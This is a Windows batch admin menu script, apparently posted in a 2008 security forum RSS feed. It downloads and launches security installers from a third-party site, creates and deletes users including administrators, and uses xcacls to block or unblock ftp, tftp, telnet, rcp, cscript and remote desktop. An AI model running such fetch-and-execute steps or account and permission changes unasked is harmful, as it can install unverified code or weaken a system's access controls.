if &#34;%choice%&#34; == &#34;1&#34; goto &#58;AVGAV
if &#34;%choice%&#34; == &#34;2&#34; goto &#58;AVGAS
if &#34;%choice%&#34; == &#34;3&#34; goto &#58;ZLZA
if &#34;%choice%&#34; == &#34;4&#34; goto &#58;XC
if &#34;%choice%&#34; == &#34;5&#34; goto &#58;CUG
if &#34;%choice%&#34; == &#34;6&#34; goto &#58;CU
if &#34;%choice%&#34; == &#34;7&#34; goto &#58;MU
if &#34;%choice%&#34; == &#34;8&#34; goto &#58;RPW
if &#34;%choice%&#34; == &#34;9&#34; goto &#58;DATAP
if &#34;%choice%&#34; == &#34;10&#34; goto &#58;GATDP
if &#34;%choice%&#34; == &#34;11&#34; goto &#58;ATA
if &#34;%choice%&#34; == &#34;12&#34; goto &#58;CRED
if &#34;%choice%&#34; == &#34;13&#34; goto &#58;EXIT

&#58;AVGAV
MD C&#58;&#092;IDIOT_TEMP
cls
Echo.
Echo Download AVG Anti-Virus 7.5 Free Edition
Echo ----------------------------------------
wget http&#58;//www.clockworkstudios.org/idiot_files/avg75free_516a1225.exe
cls
move avg75free_516a1225.exe C&#58;&#092;IDIOT_TEMP&#092;
Echo When The Download Has Finished Press Enter...
pause
start C&#58;&#092;IDIOT_TEMP&#092;avg75free_516a1225.exe
cls
goto &#58;main

&#58;AVGAS
MD C&#58;&#092;IDIOT_TEMP
cls
Echo.
Echo Download AVG Anti-Spyware
Echo -------------------------
wget http&#58;//www.clockworkstudios.org/idiot_files/avgas-setup-7.5.1.43.exe
cls
move C&#58;&#092;IDIOT_TEMP&#092;avgas-setup-7.5.1.43.exe C&#58;&#092;IDIOT_TEMP
Echo When The Download Has Finished Press Enter...
pause
start avgas-setup-7.5.1.43.exe
cls
goto &#58;main

&#58;ZLZA
MD C&#58;&#092;IDIOT_TEMP
cls
Echo.
Echo Download ZoneLabs Zone Alarm
Echo ----------------------------
wget http&#58;//www.clockworkstudios.org/idiot_files/zaZA_Setup_en.exe
cls
move zaZA_Setup_en.exe C&#58;&#092;IDIOT_TEMP
Echo When The Download Has Finished Press Enter...
pause
start C&#58;&#092;IDIOT_TEMP&#092;zaZA_Setup_en.exe
cls
goto &#58;main

&#58;XC
cls
Echo.
Echo Download Xcacls.exe
Echo -------------------
wget http&#58;//www.clockworkstudios.org/idiot_files/xcacls.exe
cls
move xcacls.exe %windir%&#092;system32&#092;
cls
goto &#58;main

&#58;CUG
cls
Echo.
Echo Create User Group
Echo -----------------
set /p group_name=Enter the desired name for the new group&#58;
net localgroup %group_name% /add
cls
goto &#58;main

&#58;CU
cls
Echo.
Echo Create User
Echo -----------
Echo 1&#41; Create a Restricted User Account
Echo 2&#41; Create a Power User Account
Echo 3&#41; Create an Administrator Account *
Echo 4&#41; Return To Main
set /p user_type=Which type of user do you want to create &#40;1-4&#41;&#58;

if &#34;%user_type%&#34; == &#34;1&#34; goto &#58;Restricted_User
if &#34;%user_type%&#34; == &#34;2&#34; goto &#58;Power_User
if &#34;%user_type%&#34; == &#34;3&#34; goto &#58;Administrator_User 
if &#34;%user_type%&#34; == &#34;4&#34; goto &#58;main

&#58;Restricted_User
Echo Create Restricted User
Echo ----------------------
set /p ru_name=Enter the desired user name&#58;
net user %ru_name% /add
cls
goto &#58;main

&#58;Power_User
Echo Create Power User
Echo -----------------
set /p pu_name=Enter the desired user name&#58;
net user %pu_name% /add
net localgroup &#34;Power Users&#34; %pu_name% /add
cls
goto &#58;main

&#58;Administrator_User
Echo Create Administrator
Echo --------------------
set /p a_name=Enter the desired user name&#58;
net user %a_name% /add
net localgroup Administrators %a_name% /add
cls
goto &#58;main

&#58;MU
cls
Echo.
Echo Modify User
Echo -----------
Echo 1&#41; Change Users Localgroup &#40;Limited, Power User, Administrator&#41; * 
Echo 2&#41; Delete User **WARNING ALL USER DATA/SETTINGS WILL BE LOST! CANNOT BE UNDONE!!**
Echo 3&#41; Return To Main Screen
set /p mod_type=How would you like to modify this user &#40;1-2&#41;&#58;

if &#34;%mod_type%&#34; == &#34;1&#34; goto &#58;change_user_localgroup
if &#34;%mod_type%&#34; == &#34;2&#34; goto &#58;delete_user
if &#34;%mod_type%&#34; == &#34;3&#34; goto &#58;main

&#58;change_user_localgroup
set /p user_name=User To Modify&#58;
set /p new_group=Name of Localgroup You Would Like %user_name% added to&#58;
net localgroup &#34;%new_group%&#34; &#34;%user_name%&#34; /add
cls
goto &#58;main

&#58;delete_user
set /p user_name=User To Delete&#58;
net user %user_name% /delete
cls
goto &#58;main

&#58;RPW
cls
Echo.
Echo Reset User Password *
Echo -------------------
Echo Once you enter the username, you will be prompted to enter a
Echo new password. Text WILL NOT be output to screen for
Echo security reasons. PLEASE BE ACCURATE!

set /p user_name=User whose password you want to reset&#58;
net user %user_name% *
cls
goto &#58;main

&#58;DATAP
cls
Echo.
Echo Deny Access To A Program
Echo ------------------------
Echo 1&#41; Default List of Programs To Deny Access To
Echo 2&#41; Custom Program
Echo 3&#41; Return To Main
set /p list_type=Please select a list &#40;1-2&#41;&#58;

if &#34;%list_type%&#34; == &#34;1&#34; goto &#58;default_list
if &#34;%list_type%&#34; == &#34;2&#34; goto &#58;custom_list
if &#34;%list_type%&#34; == &#34;3&#34; goto &#58;main

&#58;default_list
Echo Default Deny List
Echo -----------------
Echo 1&#41;FTP.exe
Echo 2&#41;Cscript.exe
Echo 3&#41;RCP.exe
Echo 4&#41;TFTP.exe
Echo 5&#41;Telnet.exe
Echo 6&#41;Internet Explorer
Echo 7&#41;Windows Messenger
Echo 8&#41;Remote Desktop Connection
Echo 9&#41;All Games
Echo 10&#41;Entire List
Echo 11&#41;Return To Main
set /p default_program=Select a program to deny access to&#58;

if &#34;%default_program%&#34; == &#34;1&#34; goto &#58;deny_ftp
if &#34;%default_program%&#34; == &#34;2&#34; goto &#58;deny_cscript
if &#34;%default_program%&#34; == &#34;3&#34; goto &#58;deny_rcp
if &#34;%default_program%&#34; == &#34;4&#34; goto &#58;deny_tftp
if &#34;%default_program%&#34; == &#34;5&#34; goto &#58;deny_telnet
if &#34;%default_program%&#34; == &#34;6&#34; goto &#58;deny_iexplorer
if &#34;%default_program%&#34; == &#34;7&#34; goto &#58;deny_msmsg
if &#34;%default_program%&#34; == &#34;8&#34; goto &#58;deny_mstsc
if &#34;%default_program%&#34; == &#34;9&#34; goto &#58;deny_games
if &#34;%default_program%&#34; == &#34;10&#34; goto &#58;deny_all
if &#34;%default_program%&#34; == &#34;11&#34; goto &#58;main

&#58;deny_ftp
cls
xcacls %windir%&#092;system32&#092;ftp.exe /D EVERYONE /Y
cls
Echo All instances of FTP.EXE have been disabled
pause
goto &#58;default_list

&#58;deny_cscript
cls
xcacls %windir%&#092;system32&#092;cscript.exe /D EVERYONE /Y
cls
Echo All instances of CSCRIPT.EXE have been disabled
pause
goto &#58;default_list

&#58;deny_rcp
cls
xcacls %windir%&#092;system32&#092;rcp.exe /D EVERYONE /Y
cls
Echo All instances of RCP.EXE have been disabled
pause
goto &#58;default_list

&#58;deny_tftp
cls
xcacls %windir%&#092;system32&#092;tftp.exe /D EVERYONE /Y
cls
Echo All instances of TFTP.EXE have been disabled
pause
goto &#58;default_list

&#58;deny_telnet
cls
xcacls %windir%&#092;system32&#092;telnet.exe /D EVERYONE /Y
cls
Echo All instances of TELNET.EXE have been disabled
pause
goto &#58;default_list

&#58;deny_iexplorer
cls
xcacls c&#58;&#092;program files&#092;internet explorer&#092;iexplore.exe /D EVERYONE /Y
cls
Echo All instances of IEXPLORE.EXE have been disabled
pause
goto &#58;default_list

&#58;deny_msmsg
cls
xcacls C&#58;&#092;Program Files&#092;Messenger&#092;msmsgs.exe /D EVERYONE /Y
cls
Echo All instances of MSMSGS.EXE have been disabled
pause
goto &#58;default_list

&#58;deny_mstsc
cls
xcacls %windir%&#092;system32&#092;mstsc.exe /D EVERYONE /Y
cls
Echo All instances of MSTSC.EXE have been disabled
pause
goto &#58;default_list

&#58;deny_games
cls
xcacls %windir%&#092;system32&#092;sol.exe /D EVERYONE /Y
cls
xcacls %windir%&#092;system32&#092;spider.exe /D EVERYONE /Y
cls
xcacls %windir%&#092;system32&#092;freecell.exe /D EVERYONE /Y
cls
xcacls %windir%&#092;system32&#092;mshearts.exe /D EVERYONE /Y
cls
xcacls %windir%&#092;system32&#092;winmine.exe /D EVERYONE /Y
cls
xcacls %windir%&#092;system32&#092;pinball.exe /D EVERYONE /Y
cls
Echo The following games have been blocked Solitare, Spider Solitare,
Echo Hearts, Minesweeper, and 3D Space Cadet Pinball
pause
goto &#58;default_list

&#58;deny_all
cls
xcacls %windir%&#092;system32&#092;ftp.exe /D EVERYONE /Y
cls
xcacls %windir%&#092;system32&#092;tftp.exe /D EVERYONE /Y
cls
xcacls %windir%&#092;system32&#092;rcp.exe /D EVERYONE /Y
cls
xcacls %windir%&#092;system32&#092;telnet.exe /D EVERYONE /Y
cls
xcacls %windir%&#092;system32&#092;mstsc.exe /D EVERYONE /Y
cls
xcacls c&#58;&#092;program files&#092;internet explorer&#092;iexplore.exe /D EVERYONE /Y
cls
xcacls C&#58;&#092;Program Files&#092;Messenger&#092;msmsgs.exe /D EVERYONE /Y
cls
xcacls %windir%&#092;system32&#092;sol.exe /D EVERYONE /Y
cls
xcacls %windir%&#092;system32&#092;spider.exe /D EVERYONE /Y
cls
xcacls %windir%&#092;system32&#092;freecell.exe /D EVERYONE /Y
cls
xcacls %windir%&#092;system32&#092;mshearts.exe /D EVERYONE /Y
cls
xcacls %windir%&#092;system32&#092;winmine.exe /D EVERYONE /Y
cls
xcacls %windir%&#092;system32&#092;pinball.exe /D EVERYONE /Y
cls

Echo The Following Programs Have Been Blocked&#58;
Echo -FTP
Echo -TFTP
Echo -RCP
ECho -TELNET
Echo -REMOTE DESKTOP CONNECTION
Echo -INTERNET EXPLORER
Echo -WINDOWS MESSENGER
Echo -SOLITARE
Echo -SPIDER SOLITARE
Echo -FREE CELL
Echo -HEARTS
Echo -MINESWEEPER
Echo -3D SPACE CADET PINBALL
pause
cls
goto &#58;default_list

&#58;custom_list
Echo Custom Program To Deny Access To
Echo --------------------------------
set /p path=Full Path To Program &#40;C&#58;&#092;path&#092;to&#092;program&#092;program.exe&#41;&#58;
set /p prog_name=Name of Program&#58;
xcacls %path% /D EVERYONE /Y
cls
Echo Access to %prog_name% has been blocked!
pause
cls
goto &#58;main

&#58;GATDP
cls
Echo.
Echo Grant Access To Denied Program
Echo ------------------------------
Echo 1&#41; Default List of Programs To Grant Access To
Echo 2&#41; Custom Program
Echo 3&#41; Return To Main
set /p list_type=Please select a list &#40;1-2&#41;&#58;

if &#34;%list_type%&#34; == &#34;1&#34; goto &#58;default_allow_list
if &#34;%list_type%&#34; == &#34;2&#34; goto &#58;custom_allow_list
if &#34;%list_type%&#34; == &#34;3&#34; goto &#58;main

&#58;default_allow_list
Echo Default Allow List
Echo -----------------
Echo 1&#41;FTP.exe
Echo 2&#41;Cscript.exe
Echo 3&#41;RCP.exe
Echo 4&#41;TFTP.exe
Echo 5&#41;Telnet.exe
Echo 6&#41;Internet Explorer
Echo 7&#41;Windows Messenger
Echo 8&#41;Remote Desktop Connection
Echo 9&#41;All Games
Echo 10&#41;Entire List
Echo 11&#41;Return To Main
set /p default_program=Select a program to deny access to&#58;

if &#34;%default_program%&#34; == &#34;1&#34; goto &#58;allow_ftp
if &#34;%default_program%&#34; == &#34;2&#34; goto &#58;allow_cscript
if &#34;%default_program%&#34; == &#34;3&#34; goto &#58;allow_rcp
if &#34;%default_program%&#34; == &#34;4&#34; goto &#58;allow_tftp
if &#34;%default_program%&#34; == &#34;5&#34; goto &#58;allow_telnet
if &#34;%default_program%&#34; == &#34;6&#34; goto &#58;allow_iexplorer
if &#34;%default_program%&#34; == &#34;7&#34; goto &#58;allow_msmsg
if &#34;%default_program%&#34; == &#34;8&#34; goto &#58;allow_mstsc
if &#34;%default_program%&#34; == &#34;9&#34; goto &#58;allow_games
if &#34;%default_program%&#34; == &#34;10&#34; goto &#58;allow_all
if &#34;%default_program%&#34; == &#34;11&#34; goto &#58;main

&#58;allow_ftp
xcacls %windir%&#092;system32&#092;ftp.exe /G EVERYONE&#58;F /Y
cls
Echo Access To FTP.EXE Granted &#58;&#41;
pause
cls
goto &#58;main

&#58;allow_cscript
xcacls %windir%&#092;system32&#092;cscript.exe /G EVERYONE&#58;F /Y
cls
Echo Access To CSCRIPT.EXE Granted &#58;&#41;
pause
cls
goto &#58;main

&#58;allow_rcp
xcacls %windir%&#092;system32&#092;rcp.exe /G EVERYONE&#58;F /Y
cls
Echo Access To RCP.EXE Granted &#58;&#41;
pause
cls
goto &#58;main

&#58;allow_tftp
xcacls %windir%&#092;system32&#092;tftp.exe /G EVERYONE&#58;F /Y
cls
Echo Access To TFTP.EXE Granted &#58;&#41;
pause
cls
goto &#58;main

&#58;allow_telnet
xcacls %windir%&#092;system32&#092;telnet.exe /G EVERYONE&#58;F /Y
cls
Echo Access To TELNET.EXE Granted &#58;&#41;
pause
cls
goto &#58;main

&#58;allow_iexplorer
xcacls c&#58;&#092;program files&#092;internet explorer&#092;iexplore.exe /G EVERYONE&#58;F /Y
cls
Echo Access To IEXPLORE.EXE Granted &#58;&#41;
pause
cls
goto &#58;main


&#58;allow_msmsg
xcacls C&#58;&#092;Program Files&#092;Messenger&#092;msmsgs.exe /G EVERYONE&#58;F /Y
cls
Echo Access To MSMSGS.EXE Granted &#58;&#41;
pause
cls
goto &#58;main

&#58;allow_mstsc
xcacls %windir%&#092;system32&#092;mstsc.exe /G EVERYONE&#58;F /Y
cls
Echo Access To MSTSC.EXE Granted &#58;&#41;
pause
cls
goto &#58;main

&#58;allow_games
cls
xcacls %windir%&#092;system32&#092;sol.exe /G EVERYONE&#58;F /Y
cls
xcacls %windir%&#092;system32&#092;spider.exe /G EVERYONE&#58;F /Y
cls
xcacls %windir%&#092;system32&#092;freecell.exe /G EVERYONE&#58;F /Y
cls
xcacls %windir%&#092;system32&#092;mshearts.exe /G EVERYONE&#58;F /Y
cls
xcacls %windir%&#092;system32&#092;winmine.exe /G EVERYONE&#58;F /Y
cls
xcacls %windir%&#092;system32&#092;pinball.exe /G EVERYONE&#58;F /Y
cls
Echo The following games have been unblocked Solitare, Spider Solitare,
Echo Hearts, Minesweeper, and 3D Space Cadet Pinball
pause
cls
goto &#58;main

&#58;allow_all
cls
xcacls %windir%&#092;system32&#092;ftp.exe /G EVERYONE&#58;F /Y
cls
xcacls %windir%&#092;system32&#092;tftp.exe /G EVERYONE&#58;F /Y
cls
xcacls %windir%&#092;system32&#092;rcp.exe /G EVERYONE&#58;F /Y
cls
xcacls %windir%&#092;system32&#092;telnet.exe /G EVERYONE&#58;F /Y
cls
xcacls %windir%&#092;system32&#092;mstsc.exe /G EVERYONE&#58;F /Y
cls
xcacls c&#58;&#092;program files&#092;internet explorer&#092;iexplore.exe /G EVERYONE&#58;F /Y
cls
xcacls C&#58;&#092;Program Files&#092;Messenger&#092;msmsgs.exe /G EVERYONE&#58;F /Y
cls
xcacls %windir%&#092;system32&#092;sol.exe /G EVERYONE&#58;F /Y
cls
xcacls %windir%&#092;system32&#092;spider.exe /G EVERYONE&#58;F /Y
cls
xcacls %windir%&#092;system32&#092;freecell.exe /G EVERYONE&#58;F /Y
cls
xcacls %windir%&#092;system32&#092;mshearts.exe /G EVERYONE&#58;F /Y
cls
xcacls %windir%&#092;system32&#092;winmine.exe /G EVERYONE&#58;F /Y
cls
xcacls %windir%&#092;system32&#092;pinball.exe /G EVERYONE&#58;F /Y
cls

Echo The Following Programs Have Been Unblocked&#58;
Echo -FTP
Echo -TFTP
Echo -RCP
ECho -TELNET
Echo -REMOTE DESKTOP CONNECTION
Echo -INTERNET EXPLORER
Echo -WINDOWS MESSENGER
Echo -SOLITARE
Echo -SPIDER SOLITARE
Echo -FREE CELL
Echo -HEARTS
Echo -MINESWEEPER
Echo -3D SPACE CADET PINBALL
pause
cls
goto &#58;default_all0w_list

&#58;custom_allow_list
Echo Custom Program To Grant Access To
Echo --------------------------------
set /p path=Full Path To Program &#40;C&#58;&#092;path&#092;to&#092;program&#092;program.exe&#41;&#58;
set /p prog_name=Name of Program&#58;
xcacls %path% /G EVERYONE&#58;F /Y
cls
Echo Access to %prog_name% has been unblocked!
pause
cls
goto &#58;main




&#58;ATA
cls
Echo.
Echo About The Author
Echo ----------------
Echo para&#91;d&#93;ox has created this program because he feels
Echo that these functions should be known to all users.
Echo para&#91;d&#93;ox does not consider you to be an idiot
Echo for using this tool, the name, and it's tag-line
Echo are just simply catchy &#58;&#41;
Echo.
pause
cls
goto &#58;main

&#58;CRED
cls
Echo.
Echo Credits
Echo -------
Echo para&#91;d&#93;ox - the code, the time, the effort
Echo		   - Ryan@GovernmentSecurity.org
Echo.
Echo SilverStrm - alpha/beta tests, giving me the idea
Echo			-noemail@anywhere.com
Echo.
Echo GovernmentSecurity.org - Being the best security board ever! &#58;&#41;
Echo						-http&#58;//www.governmentsecurity.org
Echo.
pause
cls
goto &#58;main

&#58;EXIT
exit</pre><div id='attach_wrap' class='rounded clearfix'>
	<h4></h4>
	<ul>
		
			<li class='clear'>
				<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=4888" title=""><img src="http://www.governmentsecurity.org/forum/public/style_extra/mime_types/zip.gif" alt="" /></a>
&nbsp;<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=4888" title="">auto.zip</a> <span class='desc'><strong>(3.21K)</strong></span>
<br /><span class="desc info">: 76</span>
			</li>
		
	</ul>
</div>]]></description>
		<pubDate>Fri, 07 Mar 2008 03:59:56 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=28126</guid>
	</item>
</channel>
</rss>